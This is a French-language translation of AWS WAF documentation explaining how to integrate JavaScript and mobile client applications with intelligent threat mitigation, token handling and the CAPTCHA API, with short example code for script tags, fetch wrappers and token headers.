Combinez vos intégrations clientes avec des protections par pack de protection (ACL Web) qui nécessitent des jetons valides pour accéder à vos ressources. Vous pouvez utiliser des groupes de règles qui vérifient et surveillent les jetons de défi, comme ceux répertoriés dans la section suivante[Intégration intelligente des menaces et règles AWS gérées](waf-application-integration-with-AMRs.md), à, et vous pouvez utiliser les actions de Challenge règle CAPTCHA et pour vérifier, comme décrit dans[CAPTCHAet Challenge dans AWS WAF](waf-captcha-and-challenge.md). 

AWS WAF propose deux niveaux d'intégration pour les JavaScript applications et un pour les applications mobiles : 
+ **Intégration intelligente des menaces** : vérifiez l'application cliente et assurez l'acquisition et la gestion des AWS jetons. Cette fonctionnalité est similaire à celle fournie par l'action de AWS WAF Challenge règle. Cette fonctionnalité intègre complètement votre application cliente au groupe de règles `AWSManagedRulesACFPRuleSet` géré, au groupe de règles `AWSManagedRulesATPRuleSet` géré et au niveau de protection ciblé du groupe de règles `AWSManagedRulesBotControlRuleSet` géré. 

  L'intégration intelligente des menaces APIs utilise le défi du navigateur AWS WAF silencieux pour garantir que les tentatives de connexion et les autres appels à votre ressource protégée ne sont autorisés qu'une fois que le client a obtenu un jeton valide. APIs Gérez l'autorisation par jeton pour les sessions de votre application client et collectez des informations sur le client afin de déterminer s'il est géré par un robot ou par un être humain. 
**Note**  
Ceci est disponible pour JavaScript et pour les applications mobiles Android et iOS. 
+ **Intégration des CAPTCHA** — Vérifiez les utilisateurs finaux avec un casse-tête CAPTCHA personnalisé que vous gérez dans votre application. Cette fonctionnalité est similaire à celle fournie par l'action des AWS WAF CAPTCHA règles, mais avec un contrôle accru sur le placement et le comportement du puzzle. 

  Cette intégration tire parti de l'intégration JavaScript intelligente des menaces pour lancer des défis silencieux et fournir des AWS WAF jetons à la page du client. 
**Note**  
Ceci est disponible pour les JavaScript applications. 

**Topics**
+ [Intégration intelligente des menaces et règles AWS gérées](waf-application-integration-with-AMRs.md)
+ [Accès à l'intégration de l'application AWS WAF client APIs](waf-application-integration-location-in-console.md)
+ [AWS WAF JavaScript intégrations](waf-javascript-api.md)
+ [AWS WAF intégration d'applications mobiles](waf-mobile-sdk.md)

# Intégration intelligente des menaces et règles AWS gérées
<a name="waf-application-integration-with-AMRs"></a>

Cette section explique comment APIs fonctionne l'intégration intelligente des menaces avec les groupes de règles AWS gérées.

L'intégration intelligente des menaces APIs fonctionne avec des packs de protection (Web ACLs) qui utilisent les groupes de règles de menaces intelligents pour activer toutes les fonctionnalités de ces groupes de règles gérés avancés. 
+ AWS WAF Groupe `AWSManagedRulesACFPRuleSet` de règles géré par Fraud Control pour la création de comptes et la prévention des fraudes (ACFP). 

  La fraude liée à la création de compte est une activité illégale en ligne dans le cadre de laquelle un attaquant crée des comptes non valides dans votre application dans le but, par exemple, de recevoir des bonus d'inscription ou de se faire passer pour quelqu'un. Le groupe de règles géré par l'ACFP fournit des règles pour bloquer, étiqueter et gérer les demandes susceptibles de faire partie de tentatives de création de compte frauduleuses. Ils APIs permettent d'affiner la vérification du navigateur client et les informations d'interactivité humaine que les règles ACFP utilisent pour séparer le trafic client valide du trafic malveillant.

  Pour plus d’informations, consultez [AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes](aws-managed-rule-groups-acfp.md) et [AWS WAF Contrôle des fraudes : création de comptes, prévention des fraudes (ACFP)](waf-acfp.md).
+ AWS WAF Groupe de règles géré par Fraud Control pour la prévention des prises de contrôle des comptes (ATP)`AWSManagedRulesATPRuleSet`. 

  Le piratage de compte est une activité illégale en ligne au cours de laquelle un attaquant obtient un accès non autorisé au compte d'une personne. Le groupe de règles géré par ATP fournit des règles pour bloquer, étiqueter et gérer les demandes susceptibles de faire partie de tentatives malveillantes de prise de contrôle de compte. Ils APIs permettent une vérification précise des clients et une agrégation des comportements que les règles ATP utilisent pour séparer le trafic client valide du trafic malveillant.

  Pour plus d’informations, consultez [AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md) et [AWS WAF Contrôle des fraudes et prévention des prises de contrôle des comptes (ATP)](waf-atp.md).
+ Niveau de protection ciblé du groupe de règles géré par AWS WAF Bot Control`AWSManagedRulesBotControlRuleSet`. 

  Les robots peuvent être des robots utiles et auto-identifiables, comme la plupart des moteurs de recherche et des robots d'exploration, ou des robots malveillants qui agissent contre votre site Web et ne s'identifient pas eux-mêmes. Le groupe de règles géré par Bot Control fournit des règles pour surveiller, étiqueter et gérer l'activité des robots dans votre trafic Web. Lorsque vous utilisez le niveau de protection ciblé de ce groupe de règles, les règles ciblées utilisent les informations de session client qu'elles APIs fournissent pour mieux détecter les robots malveillants. 

  Pour plus d’informations, consultez [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md) et [AWS WAF Contrôle des robots](waf-bot-control.md).

Pour ajouter l'un de ces groupes de règles gérés à votre pack de protection (ACL Web), consultez les procédures [Ajouter le groupe de règles géré par l'ACFP à votre ACL Web](waf-acfp-rg-using.md)[Ajouter le groupe de règles géré par ATP à votre pack de protection (ACL Web)](waf-atp-rg-using.md), et[Ajout du groupe de règles géré par AWS WAF Bot Control à votre ACL Web](waf-bot-control-rg-using.md).

**Note**  
Les groupes de règles gérés ne bloquent actuellement pas les demandes pour lesquelles il manque des jetons. Afin de bloquer les demandes pour lesquelles il manque des jetons, une fois que vous avez implémenté l'intégration de votre application APIs, suivez les instructions sur[Blocage des demandes dont le AWS WAF jeton n'est pas valide](waf-tokens-block-missing-tokens.md). 

# Accès à l'intégration de l'application AWS WAF client APIs
<a name="waf-application-integration-location-in-console"></a>

Cette section explique où trouver l'intégration de l'application APIs dans la AWS WAF console.

Les JavaScript APIs intégrations sont généralement disponibles et vous pouvez les utiliser pour vos navigateurs et autres appareils qui s'exécutent JavaScript. 

AWS WAF propose une intégration intelligente personnalisée des menaces SDKs pour les applications mobiles Android et iOS. 
+ Pour les applications mobiles et TV Android, elles SDKs fonctionnent pour l'API Android version 23 (Android version 6) et versions ultérieures. Pour plus d'informations sur les versions d'Android, consultez les [notes de mise à jour de SDK Platform](https://developer.android.com/tools/releases/platforms).
+ Pour les applications mobiles iOS, elles SDKs fonctionnent pour iOS version 13 et versions ultérieures. Pour plus d'informations sur les versions d'iOS, consultez les [notes de mise à jour pour iOS et iPadOS](https://developer.apple.com/documentation/ios-ipados-release-notes).
+ Pour les applications Apple TV, elles SDKs fonctionnent pour tvOS version 14 ou ultérieure. Pour plus d'informations sur les versions de tvOS, consultez les notes de [mise à jour de tvOS](https://developer.apple.com/documentation/tvos-release-notes).

**Pour accéder à l'intégration APIs via la console**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Choisissez **Intégration des applications** dans le volet de navigation, puis sélectionnez l'onglet qui vous intéresse.
   + **L'intégration intelligente des menaces** est disponible pour JavaScript les applications mobiles. 

     L'onglet contient les éléments suivants :
     + Liste des packs de protection (Web ACLs) activés pour l'intégration intelligente des applications contre les menaces. La liste inclut chaque pack de protection (ACL Web) qui utilise le groupe de règles `AWSManagedRulesACFPRuleSet` `AWSManagedRulesATPRuleSet` géré, le groupe de règles géré ou le niveau de protection ciblé du groupe de règles `AWSManagedRulesBotControlRuleSet` géré. Lorsque vous implémentez la menace intelligente APIs, vous utilisez l'URL d'intégration du pack de protection (ACL Web) que vous souhaitez intégrer.
     + Celui APIs auquel vous avez accès. Ils JavaScript APIs sont toujours disponibles. Pour accéder au mobile SDKs, contactez l'assistance via [Contact AWS](https://aws.amazon.com/contact-us).
   + L'**intégration du CAPTCHA** est disponible pour les JavaScript applications. 

     L'onglet contient les éléments suivants : 
     + URL d'intégration à utiliser dans votre intégration. 
     + Les clés d'API que vous avez créées pour les domaines de vos applications clientes. Votre utilisation de l'API CAPTCHA nécessite une clé d'API cryptée qui donne aux clients le droit d'accéder au AWS WAF CAPTCHA depuis leurs domaines. Pour chaque client auquel vous effectuez l'intégration, utilisez une clé d'API contenant le domaine du client. Pour plus d'informations sur ces exigences et sur la gestion de ces clés, consultez[Gestion des clés d'API pour l'API JS CAPTCHA](waf-js-captcha-api-key.md).

# AWS WAF JavaScript intégrations
<a name="waf-javascript-api"></a>

Cette section explique comment utiliser les AWS WAF JavaScript intégrations.

Vous pouvez utiliser l' JavaScript intégration APIs pour implémenter des intégrations AWS WAF d'applications dans vos navigateurs et autres appareils qui s'exécutent JavaScript. 

Les puzzles CAPTCHA et les défis silencieux ne peuvent être exécutés que lorsque les navigateurs accèdent à des points de terminaison HTTPS. Les clients du navigateur doivent fonctionner dans des contextes sécurisés pour acquérir des jetons. 
+ Cette menace APIs intelligente vous permet de gérer l'autorisation des jetons par le biais d'un défi de navigateur silencieux côté client et d'inclure les jetons dans les demandes que vous envoyez à vos ressources protégées. 
+ L'API d'intégration CAPTCHA renforce la menace APIs intelligente et vous permet de personnaliser l'emplacement et les caractéristiques du puzzle CAPTCHA dans vos applications clientes. Cette API exploite la menace intelligente pour acquérir des AWS WAF jetons APIs à utiliser sur la page une fois que l'utilisateur final a réussi à résoudre le casse-tête CAPTCHA. 

En utilisant ces intégrations, vous vous assurez que les appels de procédure à distance de votre client contiennent un jeton valide. Lorsque ces intégrations APIs sont en place sur les pages de votre application, vous pouvez implémenter des règles d'atténuation dans votre pack de protection (ACL Web), telles que le blocage des demandes qui ne contiennent pas de jeton valide. Vous pouvez également implémenter des règles qui imposent l'utilisation des jetons que vos applications clientes obtiennent, en utilisant les CAPTCHA actions Challenge ou de vos règles. 

**Exemple de mise en œuvre d'une menace intelligente APIs**  
La liste suivante présente les composants de base d'une implémentation typique de la menace intelligente APIs dans une page d'application Web. 

```
<head>
<script type="text/javascript" src="protection pack (web ACL) integration URL/challenge.js" defer></script>
</head>
<script>
const login_response = await AwsWafIntegration.fetch(login_url, {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json'
    },
    body: login_body
  });
</script>
```

**Exemple d'implémentation de l'API CAPTCHA JavaScript**  
L'API d'intégration CAPTCHA vous permet de personnaliser l'expérience de puzzle CAPTCHA de vos utilisateurs finaux. L'intégration CAPTCHA tire parti de l'intégration JavaScript intelligente des menaces, pour la vérification du navigateur et la gestion des jetons, et ajoute une fonction pour configurer et afficher le puzzle CAPTCHA. 

La liste suivante présente les composants de base d'une implémentation typique de l' JavaScript API CAPTCHA dans une page d'application Web. 

```
<head>
    <script type="text/javascript" src="<Integration URL>/jsapi.js" defer></script>
</head>

<script type="text/javascript">
    function showMyCaptcha() {
        var container = document.querySelector("#my-captcha-container");
        
        AwsWafCaptcha.renderCaptcha(container, {
            apiKey: "...API key goes here...",
            onSuccess: captchaExampleSuccessFunction,
            onError: captchaExampleErrorFunction,
            ...other configuration parameters as needed...
        });
    }
    
    function captchaExampleSuccessFunction(wafToken) {
        // Use WAF token to access protected resources
        AwsWafIntegration.fetch("...WAF-protected URL...", {
            method: "POST",
            ...
        });
    }
    
    function captchaExampleErrorFunction(error) {
        /* Do something with the error */
    }
</script>

<div id="my-captcha-container">
    <!-- The contents of this container will be replaced by the captcha widget -->
</div>
```

**Topics**
+ [Fournir des domaines à utiliser dans les jetons](waf-js-challenge-api-set-token-domain.md)
+ [Utilisation de l' JavaScript API avec des politiques de sécurité du contenu](waf-javascript-api-csp.md)
+ [Utilisation de l' JavaScript API de gestion intelligente des menaces](waf-js-challenge-api.md)
+ [Utilisation de l'API CAPTCHA JavaScript](waf-js-captcha-api.md)

# Fournir des domaines à utiliser dans les jetons
<a name="waf-js-challenge-api-set-token-domain"></a>

Cette section explique comment fournir des domaines supplémentaires pour les jetons.

Par défaut, lors de AWS WAF la création d'un jeton, celui-ci utilise le domaine hôte de la ressource associée au pack de protection (ACL Web). Vous pouvez fournir des domaines supplémentaires pour les jetons AWS WAF créés pour le JavaScript APIs. Pour ce faire, configurez la variable `window.awsWafCookieDomainList` globale avec un ou plusieurs domaines de jetons. 

Lors AWS WAF de la création d'un jeton, il utilise le domaine le plus approprié et le plus court parmi la combinaison des domaines `window.awsWafCookieDomainList` et du domaine hôte de la ressource associée au pack de protection (ACL Web). 

Exemples de paramètres : 

```
window.awsWafCookieDomainList = ['.aws.amazon.com']
```

```
window.awsWafCookieDomainList = ['.aws.amazon.com', 'abc.aws.amazon.com']
```

Vous ne pouvez pas utiliser de suffixes publics dans cette liste. Par exemple, vous ne pouvez pas utiliser `gov.au` ou `co.uk` comme domaines symboliques dans la liste.

Les domaines que vous spécifiez dans cette liste doivent être compatibles avec vos autres domaines et configurations de domaines : 
+ Les domaines doivent être ceux qui AWS WAF seront acceptés, en fonction du domaine hôte protégé et de la liste de domaines de jetons configurée pour le pack de protection (ACL Web). Pour de plus amples informations, veuillez consulter [AWS WAF configuration de la liste de domaines de jetons du pack de protection (ACL Web)](waf-tokens-domains.md#waf-tokens-domain-lists). 
+ Si vous utilisez l'API JavaScript CAPTCHA, au moins un domaine de votre clé d'API CAPTCHA doit correspondre exactement à l'un des domaines de jetons `window.awsWafCookieDomainList` ou il doit être le domaine apex de l'un de ces domaines de jetons. 

  Par exemple, pour le domaine de jeton`mySubdomain.myApex.com`, la clé `mySubdomain.myApex.com` d'API correspond exactement et la clé d'API `myApex.com` est le domaine apex. L'une ou l'autre des clés correspond au domaine du jeton. 

  Pour plus d'informations sur les clés d'API, consultez[Gestion des clés d'API pour l'API JS CAPTCHA](waf-js-captcha-api-key.md). 

Si vous utilisez le groupe de règles `AWSManagedRulesACFPRuleSet` géré, vous pouvez configurer un domaine qui correspond à celui indiqué dans le chemin de création de compte que vous avez indiqué dans la configuration du groupe de règles. Pour en savoir plus sur cette configuration, consultez [Ajouter le groupe de règles géré par l'ACFP à votre ACL Web](waf-acfp-rg-using.md).

Si vous utilisez le groupe de règles `AWSManagedRulesATPRuleSet` géré, vous pouvez configurer un domaine qui correspond à celui indiqué dans le chemin de connexion que vous avez indiqué pour la configuration du groupe de règles. Pour en savoir plus sur cette configuration, consultez [Ajouter le groupe de règles géré par ATP à votre pack de protection (ACL Web)](waf-atp-rg-using.md).

# Utilisation de l' JavaScript API avec des politiques de sécurité du contenu
<a name="waf-javascript-api-csp"></a>

Cette section fournit un exemple de configuration pour autoriser le domaine AWS WAF apex à être répertorié.

Si vous appliquez des politiques de sécurité du contenu (CSP) à vos ressources, pour que votre JavaScript implémentation fonctionne, vous devez autoriser le domaine AWS WAF apex sur la liste. `awswaf.com` Ils JavaScript SDKs font des appels à différents AWS WAF points de terminaison, donc allowlisting ce domaine fournit les autorisations dont ils SDKs ont besoin pour fonctionner.

Voici un exemple de configuration permettant d'autoriser le domaine AWS WAF apex à être répertorié : 

```
connect-src 'self' https://*.awswaf.com;
script-src 'self' https://*.awswaf.com;
script-src-elem 'self' https://*.awswaf.com;
```

Si vous essayez d'utiliser le JavaScript SDKs avec des ressources qui utilisent le CSP et que vous n'avez pas autorisé le AWS WAF domaine dans la liste, vous recevrez des erreurs du type suivant : 

```
Refused to load the script ...awswaf.com/<> because it violates the following Content Security Policy directive: “script-src ‘self’
```

# Utilisation de l' JavaScript API de gestion intelligente des menaces
<a name="waf-js-challenge-api"></a>

Cette section fournit des instructions relatives à l'utilisation de l' JavaScript API de menace intelligente dans votre application cliente.

La menace intelligente APIs fournit des opérations permettant d'exécuter des défis silencieux contre le navigateur de l'utilisateur et de gérer les AWS WAF jetons qui prouvent le succès des réponses aux défis et aux CAPTCHA. 

Implémentez l' JavaScript intégration d'abord dans un environnement de test, puis en production. Pour obtenir des conseils supplémentaires sur le codage, consultez les sections suivantes. 

 

**Pour utiliser la menace intelligente APIs**

1. **Installez le APIs** 

   Si vous utilisez l'API CAPTCHA, vous pouvez ignorer cette étape. Lorsque vous installez l'API CAPTCHA, le script installe automatiquement la menace intelligente. APIs

   1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

   1. Dans le panneau de navigation, choisissez **Intégration d'applications**. Sur la page **d'intégration des applications**, vous pouvez voir les options sous forme d'onglets. 

   1. Sélectionnez **Intégration intelligente des menaces**

   1. Dans l'onglet, sélectionnez le pack de protection (ACL Web) que vous souhaitez intégrer. La liste des packs de protection (ACL Web) inclut uniquement les packs de protection (Web ACLs) qui utilisent le groupe de règles `AWSManagedRulesACFPRuleSet` `AWSManagedRulesATPRuleSet` géré, le groupe de règles géré ou le niveau de protection ciblé du groupe de règles `AWSManagedRulesBotControlRuleSet` géré. 

   1. Ouvrez le volet **JavaScript SDK** et copiez la balise de script à utiliser dans votre intégration. 

   1. Dans le code de page de votre application, dans la `<head>` section, insérez la balise de script que vous avez copiée pour le pack de protection (ACL Web). Cette inclusion permet à votre application cliente de récupérer automatiquement un jeton en arrière-plan lors du chargement de la page. 

      ```
      <head>
          <script type="text/javascript" src="protection pack (web ACL) integration URL/challenge.js” defer></script>
      <head>
      ```

      Cette `<script>` liste est configurée avec l'`defer`attribut, mais vous pouvez modifier le paramètre `async` si vous souhaitez un comportement différent pour votre page. 

1. **(Facultatif) Ajoutez une configuration de domaine pour les jetons du client** : par défaut, AWS WAF lors de la création d'un jeton, celui-ci utilise le domaine hôte de la ressource associée au pack de protection (ACL Web). Pour fournir des domaines supplémentaires pour le JavaScript APIs, suivez les instructions sur[Fournir des domaines à utiliser dans les jetons](waf-js-challenge-api-set-token-domain.md). 

1. **Codez votre intégration intelligente des menaces** : écrivez votre code pour vous assurer que la récupération des jetons est terminée avant que le client n'envoie ses demandes à vos points de terminaison protégés. Si vous utilisez déjà l'`fetch`API pour effectuer votre appel, vous pouvez remplacer le `fetch` wrapper AWS WAF d'intégration. Si vous n'utilisez pas l'`fetch`API, vous pouvez utiliser l'`getToken`opération AWS WAF d'intégration à la place. Pour obtenir des conseils de codage, consultez les sections suivantes. 

1. **Ajoutez la vérification par jeton dans votre pack de protection (ACL Web)** : ajoutez au moins une règle à votre pack de protection (ACL Web) qui vérifie la validité d'un jeton de défi dans les requêtes Web envoyées par votre client. Vous pouvez utiliser des groupes de règles qui vérifient et surveillent les jetons de défi, comme le niveau cible du groupe de règles géré par Bot Control, et vous pouvez utiliser l'action de Challenge règle pour vérifier, comme décrit dans[CAPTCHAet Challenge dans AWS WAF](waf-captcha-and-challenge.md). 

   Les ajouts au pack de protection (ACL Web) vérifient que les demandes adressées à vos points de terminaison protégés incluent le jeton que vous avez acquis lors de l'intégration de votre client. Les demandes qui incluent un jeton valide et non expiré passent l'Challengeinspection et ne constituent pas un autre défi silencieux pour votre client. 

1. **(Facultatif) Bloquer les demandes pour lesquelles il manque des jetons** — Si vous utilisez le APIs groupe de règles géré par l'ACFP, le groupe de règles géré ATP ou les règles ciblées du groupe de règles Bot Control, ces règles ne bloquent pas les demandes contenant des jetons manquants. Pour bloquer les demandes auxquelles il manque des jetons, suivez les instructions sur[Blocage des demandes dont le AWS WAF jeton n'est pas valide](waf-tokens-block-missing-tokens.md). 

**Topics**
+ [Spécification de l'API de menace intelligente](waf-js-challenge-api-specification.md)
+ [Comment utiliser le `fetch` wrapper d'intégration](waf-js-challenge-api-fetch-wrapper.md)
+ [Comment utiliser l'intégration `getToken`](waf-js-challenge-api-get-token.md)

# Spécification de l'API de menace intelligente
<a name="waf-js-challenge-api-specification"></a>

Cette section répertorie les spécifications relatives aux méthodes et aux propriétés de l'atténuation intelligente des menaces JavaScript APIs. Utilisez-les APIs pour les intégrations intelligentes des menaces et des CAPTCHA.

**`AwsWafIntegration.fetch()`**  
Envoie la `fetch` requête HTTP au serveur à l'aide de l'implémentation AWS WAF d'intégration. 

**`AwsWafIntegration.getToken()`**  
Récupère le AWS WAF jeton stocké et le stocke dans un cookie sur la page en cours avec un nom `aws-waf-token` et une valeur définie sur la valeur du jeton. 

**`AwsWafIntegration.hasToken()`**  
Renvoie une valeur booléenne indiquant si le `aws-waf-token` cookie contient actuellement un jeton non expiré. 

Si vous utilisez également l'intégration CAPTCHA, consultez les spécifications correspondantes à l'adresse. [Spécification de l'API CAPTCHA JavaScript](waf-js-captcha-api-specification.md)

# Comment utiliser le `fetch` wrapper d'intégration
<a name="waf-js-challenge-api-fetch-wrapper"></a>

Cette section fournit des instructions pour utiliser le `fetch` wrapper d'intégration.

Vous pouvez utiliser le AWS WAF `fetch` wrapper en modifiant vos `fetch` appels habituels à l'`fetch`API sous l'espace de `AwsWafIntegration` noms. Le AWS WAF wrapper prend en charge les mêmes options que l'appel d' JavaScript `fetch`API standard et ajoute la gestion des jetons pour l'intégration. Cette approche est généralement la méthode la plus simple pour intégrer votre application. 

**Avant l'implémentation du wrapper**  
La liste d'exemples suivante montre le code standard avant d'implémenter le `AwsWafIntegration` `fetch` wrapper.

```
const login_response = await fetch(login_url, {
	    method: 'POST',
	    headers: {
	      'Content-Type': 'application/json'
	    },
	    body: login_body
	  });
```

**Après l'implémentation du wrapper**  
La liste suivante montre le même code avec l'implémentation du `AwsWafIntegration` `fetch` wrapper.

```
const login_response = await AwsWafIntegration.fetch(login_url, {
	    method: 'POST',
	    headers: {
	      'Content-Type': 'application/json'
	    },
	    body: login_body
	  });
```

# Comment utiliser l'intégration `getToken`
<a name="waf-js-challenge-api-get-token"></a>

Cette section explique comment utiliser cette `getToken` opération.

AWS WAF nécessite que vos demandes adressées aux points de terminaison protégés incluent le cookie nommé `aws-waf-token` avec la valeur de votre jeton actuel. 

L'`getToken`opération est un appel d'API asynchrone qui récupère le AWS WAF jeton et le stocke dans un cookie sur la page en cours avec un nom `aws-waf-token` et une valeur définie sur la valeur du jeton. Vous pouvez utiliser ce cookie symbolique selon vos besoins sur votre page. 

Lorsque vous appelez`getToken`, il effectue les opérations suivantes : 
+ Si un jeton non expiré est déjà disponible, l'appel le renvoie immédiatement.
+ Dans le cas contraire, l'appel récupère un nouveau jeton auprès du fournisseur de jetons, en attendant jusqu'à 2 secondes que le flux de travail d'acquisition de jetons soit terminé avant l'expiration du délai imparti. Si l'opération expire, elle génère une erreur que votre code d'appel doit gérer. 

L'`getToken`opération est accompagnée d'une `hasToken` opération qui indique si le `aws-waf-token` cookie contient actuellement un jeton non expiré. 

`AwsWafIntegration.getToken()`récupère un jeton valide et le stocke sous forme de cookie. La plupart des appels clients joignent automatiquement ce cookie, mais ce n'est pas le cas pour certains. Par exemple, les appels passés entre des domaines hôtes ne joignent pas le cookie. Dans les détails de mise en œuvre qui suivent, nous montrons comment travailler avec les deux types d'appels clients. 

**`getToken`Implémentation de base, pour les appels qui joignent le `aws-waf-token` cookie**  
L'exemple de liste suivant montre le code standard pour implémenter l'`getToken`opération avec une demande de connexion.

```
const login_response = await AwsWafIntegration.getToken()
	    .catch(e => {
	        // Implement error handling logic for your use case
	    })
	    // The getToken call returns the token, and doesn't typically require special handling
	    .then(token => {
	        return loginToMyPage()
	    })
	
	async function loginToMyPage() {
	    // Your existing login code
	}
```

**Soumettre le formulaire uniquement une fois que le jeton sera disponible auprès de `getToken`**  
La liste suivante indique comment enregistrer un écouteur d'événements pour intercepter les soumissions de formulaires jusqu'à ce qu'un jeton valide soit disponible pour utilisation. 

```
<body>
	  <h1>Login</h1>
	  <p></p>
	  <form id="login-form" action="/web/login" method="POST" enctype="application/x-www-form-urlencoded">
	    <label for="input_username">USERNAME</label>
	    <input type="text" name="input_username" id="input_username"><br>
	    <label for="input_password">PASSWORD</label>
	    <input type="password" name="input_password" id="input_password"><br>
	    <button type="submit">Submit<button>
	  </form>
	
	<script>
	  const form = document.querySelector("#login-form");
	
	  // Register an event listener to intercept form submissions
	  form.addEventListener("submit", (e) => {
	      // Submit the form only after a token is available 
	      if (!AwsWafIntegration.hasToken()) {
	          e.preventDefault();
	          AwsWafIntegration.getToken().then(() => {
	              e.target.submit();
	          }, (reason) => { console.log("Error:"+reason) });
	        }
	    });
	</script>
	</body>
```

**Joindre le jeton lorsque votre client n'attache pas le `aws-waf-token` cookie par défaut**  
`AwsWafIntegration.getToken()`récupère un jeton valide et le stocke sous forme de cookie, mais tous les appels clients ne joignent pas ce cookie par défaut. Par exemple, les appels passés entre des domaines hôtes ne joignent pas le cookie. 

Le `fetch` wrapper gère ces cas automatiquement, mais si vous n'êtes pas en mesure d'utiliser le `fetch` wrapper, vous pouvez le faire en utilisant un en-tête personnalisé`x-aws-waf-token`. AWS WAF lit les jetons depuis cet en-tête, en plus de les lire depuis le `aws-waf-token` cookie. Le code suivant montre un exemple de définition de l'en-tête. 

```
const token = await AwsWafIntegration.getToken();
const result = await fetch('/url', {
    headers: {
        'x-aws-waf-token': token,
    },
});
```

Par défaut, AWS WAF n'accepte que les jetons contenant le même domaine que le domaine hôte demandé. Tous les jetons interdomaines nécessitent des entrées correspondantes dans la liste des domaines des jetons du pack de protection (ACL Web). Pour de plus amples informations, veuillez consulter [AWS WAF configuration de la liste de domaines de jetons du pack de protection (ACL Web)](waf-tokens-domains.md#waf-tokens-domain-lists). 

Pour plus d'informations sur l'utilisation de jetons entre domaines, consultez [aws-waf-bot-controlaws-samples/](https://github.com/aws-samples/aws-waf-bot-control-api-protection-with-captcha) -. api-protection-with-captcha

# Utilisation de l'API CAPTCHA JavaScript
<a name="waf-js-captcha-api"></a>

Cette section fournit des instructions pour utiliser l'API d'intégration CAPTCHA.

L' JavaScript API CAPTCHA vous permet de configurer le puzzle CAPTCHA et de le placer où vous le souhaitez dans votre application cliente. Cette API exploite les fonctionnalités de la menace intelligente JavaScript APIs pour acquérir et utiliser des AWS WAF jetons une fois qu'un utilisateur final a réussi à résoudre un casse-tête CAPTCHA. 

Implémentez l' JavaScript intégration d'abord dans un environnement de test, puis en production. Pour obtenir des conseils supplémentaires sur le codage, consultez les sections suivantes. 

**Pour utiliser l'API d'intégration CAPTCHA**

1. **Installation de l'API**

   1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

   1. Dans le panneau de navigation, choisissez **Intégration d'applications**. Sur la page **d'intégration des applications**, vous pouvez voir les options sous forme d'onglets. 

   1. Sélectionnez l'**intégration CAPTCHA**.

   1. Copiez la balise de script JavaScript d'intégration répertoriée pour l'utiliser dans votre intégration.

   1. Dans le code de page de votre application, dans la `<head>` section, insérez la balise de script que vous avez copiée. Cette inclusion rend le puzzle CAPTCHA disponible pour la configuration et l'utilisation. 

      ```
      <head>
          <script type="text/javascript" src="integrationURL/jsapi.js" defer></script>
      </head>
      ```

      Cette `<script>` liste est configurée avec l'`defer`attribut, mais vous pouvez modifier le paramètre `async` si vous souhaitez un comportement différent pour votre page. 

      Le script CAPTCHA charge également automatiquement le script d'intégration intelligente des menaces s'il n'est pas déjà présent. Le script intelligent d'intégration des menaces permet à votre application cliente de récupérer automatiquement un jeton en arrière-plan lors du chargement de la page et fournit d'autres fonctionnalités de gestion des jetons dont vous avez besoin pour utiliser l'API CAPTCHA. 

1. **(Facultatif) Ajoutez une configuration de domaine pour les jetons du client** : par défaut, AWS WAF lors de la création d'un jeton, celui-ci utilise le domaine hôte de la ressource associée au pack de protection (ACL Web). Pour fournir des domaines supplémentaires pour le JavaScript APIs, suivez les instructions sur[Fournir des domaines à utiliser dans les jetons](waf-js-challenge-api-set-token-domain.md). 

1. **Obtenir la clé d'API cryptée pour le client** — L'API CAPTCHA nécessite une clé d'API cryptée contenant une liste de domaines clients valides. AWS WAF utilise cette clé pour vérifier que le domaine client que vous utilisez avec l'intégration est approuvé pour utiliser le AWS WAF CAPTCHA. Pour générer votre clé d'API, suivez les instructions sur[Gestion des clés d'API pour l'API JS CAPTCHA](waf-js-captcha-api-key.md).

1. **Codez l'implémentation de votre widget CAPTCHA** : implémentez l'appel d'`renderCaptcha()`API sur votre page, à l'endroit où vous souhaitez l'utiliser. Pour plus d'informations sur la configuration et l'utilisation de cette fonction, consultez les sections suivantes, [Spécification de l'API CAPTCHA JavaScript](waf-js-captcha-api-specification.md) et[Comment afficher le casse-tête CAPTCHA](waf-js-captcha-api-render.md). 

   L'implémentation du CAPTCHA s'intègre à l'intégration intelligente des menaces APIs pour la gestion des jetons et pour exécuter des appels de récupération utilisant les jetons. AWS WAF Pour obtenir des conseils sur leur utilisation APIs, voir[Utilisation de l' JavaScript API de gestion intelligente des menaces](waf-js-challenge-api.md).

1. **Ajoutez la vérification par jeton dans votre pack de protection (ACL Web)** : ajoutez au moins une règle à votre pack de protection (ACL Web) qui vérifie la validité d'un jeton CAPTCHA dans les requêtes Web envoyées par votre client. Vous pouvez utiliser l'action de la CAPTCHA règle pour vérifier, comme décrit dans[CAPTCHAet Challenge dans AWS WAF](waf-captcha-and-challenge.md). 

   Les ajouts au pack de protection (ACL Web) vérifient que les demandes envoyées à vos points de terminaison protégés incluent le jeton que vous avez acquis lors de l'intégration de votre client. Les demandes qui incluent un jeton CAPTCHA valide et non expiré passent l'inspection des CAPTCHA règles et ne présentent aucun autre casse-tête CAPTCHA à votre utilisateur final. 

Après avoir implémenté l' JavaScript API, vous pouvez consulter les CloudWatch statistiques relatives aux tentatives et aux solutions de casse-tête CAPTCHA. Pour les statistiques et les détails relatifs aux dimensions, voir[Mesures et dimensions du compte](waf-metrics.md#waf-metrics-account).

**Topics**
+ [Spécification de l'API CAPTCHA JavaScript](waf-js-captcha-api-specification.md)
+ [Comment afficher le casse-tête CAPTCHA](waf-js-captcha-api-render.md)
+ [Gestion d'une réponse CAPTCHA depuis AWS WAF](waf-js-captcha-api-conditional.md)
+ [Gestion des clés d'API pour l'API JS CAPTCHA](waf-js-captcha-api-key.md)

